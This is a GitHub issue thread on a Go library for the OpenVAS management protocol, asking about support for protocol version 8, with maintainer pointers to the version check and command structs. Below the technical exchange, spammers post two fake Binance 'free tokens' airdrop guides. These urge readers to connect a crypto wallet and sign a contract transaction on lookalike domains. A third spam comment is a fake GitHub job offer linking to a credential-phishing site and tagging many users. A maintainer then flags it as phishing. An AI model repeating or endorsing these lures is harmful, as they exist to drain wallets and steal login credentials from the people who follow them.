### ISSUE TITLE
Protocol 8

### ISSUE THREAD

**Issue by hazcod** [qzyse2017/openvas-golang-lib#2]
Hi, GVM 10 & 11 use Protocol version 8 which is not supported by this library.
Would it be possible to reproduce?

**Comment by hazcod** [comment]
Using docker `falkowich/gvm10:sqlite-latest`

**Comment by prism4time** [comment]
some of the commands used in 8 and 7 seems to be the same, I do not know what commands you need, you may fork the lib and fix the version check to 8, and compare the struct corresponding the command, 

for version check, it is here
https://github.com/qzyse2017/openvas-golang-lib/blob/master/omp.go#L69

and e.g if you need `create_target` command, compare https://github.com/qzyse2017/openvas-golang-lib/blob/master/cmd_target.go#L48 with the OMP 8 docs(I did not find the OMP 8 docs here)

You could also call the CreateTarget function after New() in a uint test and verify if the program here is compatible, https://github.com/qzyse2017/openvas-golang-lib/blob/master/cmd_target_test.go#L10

@hazcod

**Comment by prism4time** [comment]
https://docs.greenbone.net/API/OMP/omp-7.0.html I implement most of the methods from this doc

**Comment by gqgserver** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*

**Comment by mohamedata-code** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

[![Claim Now](https://moneybinds.com/wp-content/uploads/2023/12/Binance_Airdrop_feature_img.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "Claim" button to interact with the smart contract.

### 3. Share the Excitement on Twitter:
   - Spread the word about claiming your free tokens!
     - **Tweet:** [Share on Twitter](https://twitter.com/share?url=http://go.bnbcoinsearn.online/97Q7Yj&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceTokenGiveaway%20%23Crypto)


Winners: @garnathere, @Jaytru1997, @AmazingAng, @DiegoPGs, @XiaoYulong, @ybw202056, @ChanYeongShin, @uncleguanghui, @zuenko, @jmanzitti

**Comment by liuzhebaba** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
ellenbboe, @mauimauer, @stingh711, @lyming531, @but0n, @garychan8523, @ETHANAIR, @acangiani, @bravecheng, @sephrouse, @Vanduza, @david-huard, @chenaoxd, @arkhwise, @joeyguo, @yanlusu, @jorgecoca, @RickJamesHoe, @lijiakof, @exog3n

**Comment by prism4time** [comment]
already reported the last comment, it is obviously a phishing message, do not click the link
